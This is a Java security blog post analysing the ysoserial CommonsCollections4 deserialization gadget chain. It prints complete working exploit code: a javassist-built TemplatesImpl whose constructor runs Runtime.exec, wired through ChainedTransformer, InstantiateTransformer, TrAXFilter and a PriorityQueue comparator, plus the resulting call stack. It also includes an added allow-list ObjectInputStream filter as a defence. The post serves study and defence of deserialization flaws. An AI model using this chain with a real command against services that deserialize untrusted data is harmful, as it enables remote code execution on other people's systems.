[Java Security] Deserialization: CC4 Deserialization Vulnerability POP Chain Analysis (ysoserial CommonsCollections4 PoC Analysis)

Preface

Likewise, CC4 is a variant of CC2. The difference is the same one CC3 introduces: the trigger is InstantiateTransformer rather than InvokerTransformer.

Requires Commons-Collections4 4.0

Code Reproduction

Utility classes

Generating the malicious TemplatesImpl:

TemplatesGeneratorPacked/GetAbstractTranslet.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;

public class GetAbstractTranslet {
    public static byte[] generate() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("e");
        CtClass zuper = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(zuper);

        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        clazz.addConstructor(constructor);

        return clazz.toBytecode();
    }
}

TemplatesGeneratorPacked/GetTemplatesImpl.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import ReflectPacked.ValueGetterSetter;

public class GetTemplatesImpl {
    public static TemplatesImpl getTemplatesImpl() throws Exception{
        byte[][] bytes = new byte[][]{GetAbstractTranslet.generate()};

        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        ValueGetterSetter.setValue(templates, "_bytecodes", bytes);
        ValueGetterSetter.setValue(templates, "_name", "a");
        ValueGetterSetter.setValue(templates, "_tfactory", new TransformerFactoryImpl());

        return  templates;
    }
}


Reflection-based get/set:

ReflectPacked/ValueGetterSetter.java

package ReflectPacked;

import java.lang.reflect.Field;

public class ValueGetterSetter {
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static Object getValue(Object obj, String name) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        return field.get(obj);
    }
}


Deserialization:

UnserializePacked/Unserialize.java

package UnserializePacked;

import java.io.*;

public class Unserialize {
    public static void unserialize(Object obj) throws Exception{
        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(obj);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

PoC

package cc.cc4;

import ReflectPacked.ValueGetterSetter;
import TemplatesGeneratorPacked.GetTemplatesImpl;
import UnserializePacked.Unserialize;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.util.PriorityQueue;

public class PoC {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();

        ConstantTransformer constantTransformer = new ConstantTransformer(String.class);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(
                new Class[]{String.class},
                new Object[]{"a"}
        );

        ChainedTransformer chainedTransformer = new ChainedTransformer(
                constantTransformer,
                instantiateTransformer);

        TransformingComparator comparator = new TransformingComparator(chainedTransformer);

        PriorityQueue queue = new PriorityQueue(2, comparator);
        queue.add(1);
        queue.add(1);

        ValueGetterSetter.setValue(constantTransformer, "iConstant", TrAXFilter.class);
        ValueGetterSetter.setValue(instantiateTransformer, "iParamTypes", new Class[]{Templates.class});
        ValueGetterSetter.setValue(instantiateTransformer, "iArgs", new Object[]{templates});

        Unserialize.unserialize(queue);
    }
}

Code Audit | Principle Analysis

The idea is a combination of CC2 and CC3, so only the flow is walked through here; see the two earlier analyses:

[Java Security] Deserialization: CC2 Deserialization Vulnerability POP Chain Analysis (ysoserial CommonsCollections2 PoC Analysis)
[Java Security] Deserialization: CC3 Deserialization Vulnerability POP Chain Analysis (ysoserial CommonsCollections3 PoC Analysis)

1. Passing a TemplatesImpl to the TrAXFilter constructor calls newTransformer(), which loads and instantiates the embedded bytecode

2. InstantiateTransformer.transform() calls the constructor of the specified class (here TrAXFilter) with the specified arguments

3. TransformingComparator.compare() calls this.transformer.transform() on each element being compared

4. PriorityQueue.readObject() rebuilds the heap (heapify), which calls comparator.compare()
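Since the chain only starts once the stream is allowed to materialise a TransformingComparator, the defensive counterpart to the PoC is a look-ahead check on the deserialization sink. The class below is an added example written for this post, not code from the original article or from ysoserial: it subclasses ObjectInputStream and rejects every class descriptor that is not on an explicit allow-list, so the commons-collections4 comparator is refused before PriorityQueue.readObject() and heapify() ever run. The class name SafeObjectInputStream, the package and the allow-list contents are assumptions chosen for the demo; the JDK and commons-collections4 names are real. The second half of main() reuses a harmless ConstantTransformer to show the rejection without triggering anything.

```java
package UnserializePacked;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;

import java.io.*;
import java.util.Arrays;
import java.util.HashSet;
import java.util.PriorityQueue;
import java.util.Set;

// Added example (not from the original post): look-ahead deserialization filter.
public class SafeObjectInputStream extends ObjectInputStream {

    // Allow-list of the only types this consumer legitimately expects.
    // java.lang.Number is needed because Integer's serialized descriptor
    // carries its Serializable superclass. Everything else is refused,
    // including TransformingComparator, ChainedTransformer,
    // InstantiateTransformer, ConstantTransformer and TemplatesImpl.
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
            "java.util.PriorityQueue",
            "java.lang.Integer",
            "java.lang.Number"
    ));

    public SafeObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    // resolveClass() runs when a class descriptor is read from the stream,
    // i.e. before any instance is created or its readObject() is invoked.
    // PriorityQueue serializes its comparator field before its elements,
    // so the comparator's descriptor is the first foreign class seen here.
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!ALLOWED.contains(name)) {
            throw new InvalidClassException(name, "class not on deserialization allow-list");
        }
        return super.resolveClass(desc);
    }

    // Helper: serialize to an in-memory buffer instead of a temp file.
    public static byte[] serialize(Object obj) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(obj);
        }
        return bos.toByteArray();
    }

    // Deserialize through the filtering stream.
    public static Object safeDeserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new SafeObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Benign input: a natural-ordering queue of Integers round-trips fine.
        PriorityQueue<Integer> benign = new PriorityQueue<>();
        benign.add(2);
        benign.add(1);
        System.out.println("accepted: " + safeDeserialize(serialize(benign)));

        // Same container type, but carrying a commons-collections4 comparator.
        // The transformer is a harmless constant, yet its class is not on the
        // allow-list, so the stream is rejected at the class-descriptor stage,
        // long before heapify() would call compare().
        PriorityQueue<Integer> suspicious = new PriorityQueue<>(2,
                new TransformingComparator<Integer, Integer>(new ConstantTransformer<Integer, Integer>(1)));
        suspicious.add(1);
        suspicious.add(1);
        try {
            safeDeserialize(serialize(suspicious));
            System.out.println("unexpected: suspicious stream was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.classname);
        }
    }
}
```

On JDK 9+ (and the 8u121+ backport of JEP 290) the same allow-list can be expressed without subclassing, via ObjectInputFilter on the stream or the jdk.serialFilter system property; the resolveClass() override shown here works on the older JDK 7/8 runtimes the stack trace in this post comes from. Either way the point is the same: the filter must fire on the class descriptor, because by the time PriorityQueue.readObject() runs, the comparator already exists.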

POP chain

newTransformer:439, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:57, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:526, Constructor (java.lang.reflect)
transform:116, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:32, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:112, ChainedTransformer (org.apache.commons.collections4.functors)
compare:81, TransformingComparator (org.apache.commons.collections4.comparators)
siftDownUsingComparator:699, PriorityQueue (java.util)
siftDown:667, PriorityQueue (java.util)
heapify:713, PriorityQueue (java.util)
readObject:773, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:57, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:606, Method (java.lang.reflect)
invokeReadObject:1017, ObjectStreamClass (java.io)
readSerialData:1893, ObjectInputStream (java.io)
readOrdinaryObject:1798, ObjectInputStream (java.io)
readObject0:1350, ObjectInputStream (java.io)
readObject:370, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:40, PoC (cc.cc4)

Follow my CSDN blog: @Ho1aAs
Copyright: Ho1aAs
Link to this article: https://blog.csdn.net/Xxy605/article/details/123448990
Copyright notice: this article is original work; when reposting, cite the source and include this notice.
